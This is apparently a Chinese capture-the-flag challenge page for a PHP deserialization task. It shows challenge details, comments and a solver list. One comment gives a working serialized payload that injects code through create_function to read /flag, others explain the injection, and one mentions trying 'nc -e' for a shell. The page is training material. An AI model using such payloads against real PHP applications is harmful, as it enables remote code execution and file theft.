unserialize-NoteasyWEB 未解决

分数: 30 金币: 3
题目作者: 云牧青
一  血: ⎝Lazzaro⎠
一血奖励: 5金币
解  决: 399
提  示:
描  述:
不简单的反序列化
评论
chips 2年前

真心不会等在提升一段时间再来做

回复 0

cxh82878583 2年前

真心不会等在提升一段时间再来做

回复 0

mooho 2年前

真心不会等在提升一段时间再来做

回复 0

笨笨笨蛋 2年前

寄了,不会

回复 2

18679066006 2年前

$s=new Noteasy('create_function',';};highlight_file("/flag");/*'); echo urlencode(serialize($s));

回复 0

a1037214089 2年前

家人们 那个wp里的$b 为什么不需要考虑闭合的问题啊?create_function("",;}show_source('/flag');/*在语法上不会报错吗?我构造了一个能够闭合create_function的(的payload 结果不行....

回复 1

v3277293 2年前

哇,终于做出来了

回复 0

W01fh4cker 2年前

提示:本题关键在于$a("", $b);,同时本题环境不是PHP7.2,是PHP5;查看flag可以是highlight_file也可以是show_source。

回复 0

ShawRoot 2年前

不用那么麻烦,直接使用highlight_file就可以查看flag。

回复 1

既不萌也不新的萌新HZ 2年前

nc -e 报错,不知道该怎么办了,提示不支持-e选项

回复 0

WriteUp

image
云牧青

5 金币

评分(2)

解题动态

YameMres 攻破了该题 8小时前
2931455320 攻破了该题 2天前
zttyzz 攻破了该题 4天前
yuan88008888 攻破了该题 5天前
Jiafeng 攻破了该题 5天前
15303388281 攻破了该题 11天前
duwihxaui4 攻破了该题 11天前
17531317074 攻破了该题 11天前
17633290133 攻破了该题 11天前
20220406402033 攻破了该题 11天前
uu 攻破了该题 11天前
13930528869 攻破了该题 12天前
13078760257 攻破了该题 12天前
x1997 攻破了该题 12天前
18631310543 攻破了该题 12天前
SShine 攻破了该题 12天前
aywudiqie66 攻破了该题 12天前
1005 攻破了该题 12天前
18617628050 攻破了该题 12天前
24678 攻破了该题 12天前
问题反馈